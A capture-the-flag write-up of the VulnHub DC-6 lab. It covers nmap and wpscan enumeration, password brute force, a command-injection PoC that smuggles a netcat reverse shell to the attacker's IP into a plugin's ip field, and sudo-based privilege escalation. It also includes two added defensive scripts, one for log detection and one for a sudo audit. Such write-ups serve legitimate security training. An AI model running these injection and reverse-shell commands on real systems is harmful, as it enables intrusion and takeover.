VulnHub penetration testing diary 19: DC-6

Preface

⏰ Date: 2023.7.31
🗺️ Target VM: https://download.vulnhub.com/dc/DC-6.zip
⚠️ Every operation in this article was carried out in a simulated lab environment; never use them against real systems without authorization.
🙏 My skills are limited; if you spot a mistake, please point it out. Thank you for reading!

Information gathering

Host discovery with nmap

┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 17:11 HKT
Nmap scan report for 192.168.58.1
Host is up (0.0018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.58.2
Host is up (0.000086s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for 192.168.58.166
Host is up (0.00019s latency).

Port and banner scan with nmap

┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -A -T4 -p- 192.168.58.166
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:44:6B:A1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 199.637 days (since Fri Jan 13 01:55:01 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The HTTP title shows a redirect to http://wordy/, so the target IP has to be mapped to the hostname wordy in the hosts file:

echo '192.168.58.166 wordy'|tee -a /etc/hosts

Browse to http://wordy (a WordPress site).

Directory brute-forcing

dirsearch -u http://wordy
[17:34:55] 301 -  301B  - /wp-admin  ->  http://wordy/wp-admin/
[17:34:55] 302 -    0B  - /wp-admin/  ->  http://wordy/wp-login.php?redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&reauth=1
[17:34:55] 200 -    0B  - /wp-config.php
[17:34:55] 500 -    3KB - /wp-admin/setup-config.php
[17:34:55] 400 -    1B  - /wp-admin/admin-ajax.php
[17:34:55] 301 -  303B  - /wp-content  ->  http://wordy/wp-content/
[17:34:55] 200 -    0B  - /wp-content/
[17:34:55] 200 -    1KB - /wp-admin/install.php
[17:34:55] 403 -  316B  - /wp-content/plugins/akismet/admin.php
[17:34:55] 403 -  318B  - /wp-content/plugins/akismet/akismet.php
[17:34:55] 500 -    0B  - /wp-content/plugins/hello.php
[17:34:55] 301 -  304B  - /wp-includes  ->  http://wordy/wp-includes/
[17:34:55] 500 -    0B  - /wp-includes/rss-functions.php
[17:34:55] 200 -   42KB - /wp-includes/
[17:34:55] 200 -    0B  - /wp-cron.php
[17:34:55] 200 -    3KB - /wp-login.php
[17:34:55] 302 -    0B  - /wp-signup.php  ->  http://wordy/wp-login.php?action=register

A login page exists at /wp-login.php.

Enumerate usernames with wpscan

┌──(root㉿Erik)-[/home/eric/myfile]
└─# wpscan --url wordy -eu

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Extract the usernames into users.txt

┌──(root㉿Erik)-[/home/eric/myfile]
└─# wpscan --url wordy -eu|cut -d ' ' -f2|grep -Eo '^([a-z])*'|tee users.txt
admin
sarah
jens
graham
mark

Password brute-forcing with wpscan

┌──(root㉿Erik)-[/home/eric/myfile]
└─# wpscan -U users.txt -P passwd.txt  --max-threads 50 --url http://wordy
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01                                                                                    
Trying graham / helpdesk01 Time: 00:00:00 <================================       > (5 / 6) 83.33%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: mark, Password: helpdesk01
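Both wpscan phases above leave a distinctive trace in the web server log: one client walking `/?author=N` for consecutive IDs, then a burst of POSTs to `/xmlrpc.php`. The following detection script is an added example, not part of the original write-up; the log lines, the client IPs and the thresholds (3 distinct author IDs, 10 XML-RPC POSTs) are constructed for the example.

```shell
#!/bin/sh
# Added detection example, not from the original write-up: flag, in Apache combined-format
# access logs, author-ID enumeration (GET /?author=N) and XML-RPC password guessing
# (bursts of POST /xmlrpc.php). Log lines and thresholds are constructed, not from DC-6.

make_sample_log() {
    i=1
    while [ "$i" -le 4 ]; do   # enumeration: author=1..4 from one scanner IP
        printf '192.168.58.153 - - [31/Jul/2023:17:40:0%d +0800] "GET /?author=%d HTTP/1.1" 301 0 "-" "WPScan v3.8"\n' "$i" "$i"
        i=$((i + 1))
    done
    i=1
    while [ "$i" -le 12 ]; do  # password guessing: 12 POSTs to xmlrpc.php
        printf '192.168.58.153 - - [31/Jul/2023:17:41:%02d +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WPScan v3.8"\n' "$i"
        i=$((i + 1))
    done
    # benign traffic: a normal visitor and a single legitimate pingback POST
    printf '192.168.58.20 - - [31/Jul/2023:17:42:00 +0800] "GET /index.php/sample-page/ HTTP/1.1" 200 8200 "-" "Mozilla/5.0"\n'
    printf '192.168.58.20 - - [31/Jul/2023:17:42:01 +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WordPress/5.1"\n'
}

# Reads an access log on stdin; prints "<ip> author_probes=<n> xmlrpc_posts=<m>" for every
# client that probed >= AUTHOR_MIN distinct author IDs or sent >= XMLRPC_MIN xmlrpc POSTs.
detect_wp_enum() {
    awk -v author_min="${AUTHOR_MIN:-3}" -v xmlrpc_min="${XMLRPC_MIN:-10}" '
    {
        ip = $1
        split($0, q, "\"")          # q[2] is the request line: METHOD PATH PROTO
        split(q[2], r, " ")
        method = r[1]; path = r[2]
        if (method == "GET" && path ~ /^\/(index\.php\/)?[?]author=[0-9]+/) {
            id = path; sub(/.*author=/, "", id); sub(/[^0-9].*/, "", id)
            if (!((ip, id) in seen)) { seen[ip, id] = 1; authors[ip]++ }
        }
        if (method == "POST" && path ~ /^\/xmlrpc\.php/) xmlrpc[ip]++
    }
    END {
        for (ip in authors) all[ip] = 1
        for (ip in xmlrpc)  all[ip] = 1
        for (ip in all)
            if (authors[ip] + 0 >= author_min || xmlrpc[ip] + 0 >= xmlrpc_min)
                printf "%s author_probes=%d xmlrpc_posts=%d\n", ip, authors[ip], xmlrpc[ip]
    }'
}

make_sample_log | detect_wp_enum
```

Against a real log, pipe `/var/log/apache2/access.log` into `detect_wp_enum` instead of the sample; the thresholds can be tuned through `AUTHOR_MIN` and `XMLRPC_MIN`.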

The password is helpdesk01.
After logging in as mark, the target is the tools tab of the Plainview Activity Monitor plugin (page=plainview_activity_monitor&tab=activity_tools). Adapt the PoC HTML: point the form action at the target host and put the listener IP and port in the ip field, whose value is injected into a shell command.

<body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="ip" value="google.fr| nc 192.168.58.153 9999 -e /bin/bash" />
    <input type="hidden" name="lookup" value="Lookup" />
    <input type="submit" value="Submit request" />
  </form>
</body>

Start a listener

┌──(root㉿Erik)-[/tmp]
└─# nc -nvlp 9999
listening on [any] 9999 ...

Open the saved PoC, /tmp/45274.html, in the browser while logged in as mark; the reverse shell connects back to the listener as www-data.
Upgrade to an interactive TTY with python

python -c 'import pty;pty.spawn("/bin/bash")'

Go into mark's home directory, where there is a note with a hint:

www-data@dc-6:/home/mark$ ls -la
total 28
drwxr-xr-x 3 mark mark 4096 Apr 26  2019 .
drwxr-xr-x 6 root root 4096 Apr 26  2019 ..
-rw------- 1 mark mark    5 Apr 26  2019 .bash_history
-rw-r--r-- 1 mark mark  220 Apr 24  2019 .bash_logout
-rw-r--r-- 1 mark mark 3526 Apr 24  2019 .bashrc
-rw-r--r-- 1 mark mark  675 Apr 24  2019 .profile
drwxr-xr-x 2 mark mark 4096 Apr 26  2019 stuff
www-data@dc-6:/home/mark$ cd stuff
www-data@dc-6:/home/mark/stuff$ ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt 
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

The note gives graham's password (GSo7isUM1D4), so switch to that user (useradd is not possible as www-data; the account already exists):

su graham

In jens's home directory there is backups.sh. The file is owned by jens, yet graham can write to it, so a line that spawns a shell can be appended:

graham@dc-6:/home/jens$ cat backups.sh 
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
graham@dc-6: echo '/bin/bash' >> backups.sh
graham@dc-6:/home/jens$ cat backups.sh 
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

/bin/bash

sudo to jens: graham is allowed to run /home/jens/backups.sh as jens, so the appended /bin/bash line yields a shell as jens

sudo -u jens /home/jens/backups.sh 
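The root cause of this step is a sudo rule whose target is a script the invoking user can modify. The audit helper below is an added example, not part of the original write-up: it reads sudoers-style rules (one per line, in the `(user) NOPASSWD: /path` shape that `sudo -l` prints) and reports every command target that is not root-owned or is group/world-writable. The directory layout and rules in the demo are constructed.

```shell
#!/bin/sh
# Added audit helper, not from the original write-up. Reads sudoers-style rules (one per
# line, e.g. copied from "sudo -l") and reports each command target that is not root-owned
# or is group/world-writable: the backups.sh weakness, where a script sudo runs as jens
# can be appended to by another user. All paths used in the demo are constructed.

audit_sudo_targets() {
    rules_file="$1"
    findings=0
    while IFS= read -r rule; do
        # every absolute path in the rule is a candidate target (command or argument)
        for target in $(printf '%s\n' "$rule" | grep -oE '/[^[:space:],]+'); do
            [ -f "$target" ] || continue
            # ls -ld is POSIX: field 1 is the mode string, field 3 the owner
            set -- $(ls -ld "$target")
            mode=$1; owner=$3; reason=""
            [ "$owner" = root ] || reason="owned by $owner, not root"
            case "$mode" in ?????w*) reason="${reason:+$reason; }group-writable" ;; esac
            case "$mode" in ????????w*) reason="${reason:+$reason; }world-writable" ;; esac
            if [ -n "$reason" ]; then
                printf 'RISK %s: %s  [rule: %s]\n' "$target" "$reason" "$rule"
                findings=$((findings + 1))
            fi
        done
    done < "$rules_file"
    [ "$findings" -eq 0 ]      # exit status 0 = clean, 1 = something to fix
}

# Stand-alone demo with a constructed layout mimicking the DC-6 case.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/home/jens"
printf '#!/bin/bash\ntar -czf backups.tar.gz /var/www/html\n' > "$demo_dir/home/jens/backups.sh"
chmod 664 "$demo_dir/home/jens/backups.sh"            # group-writable, as on the target
# A root-owned, non-writable binary passes this file check; whether the program itself
# can be turned into a shell (the GTFOBins question) is a separate review.
printf '(jens) NOPASSWD: %s\n(root) NOPASSWD: /usr/bin/nmap\n' "$demo_dir/home/jens/backups.sh" > "$demo_dir/rules"
audit_sudo_targets "$demo_dir/rules" || echo "sudo targets need fixing"
rm -rf "$demo_dir"
```

Run it as the unprivileged user whose rules are being reviewed, or as root against a copy of the rule list; the fix in either case is a root-owned, mode 755 (or tighter) script.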

As jens, sudo -l shows that nmap may be run through sudo with root privileges; see https://gtfobins.github.io/gtfobins/nmap/ for the escalation technique.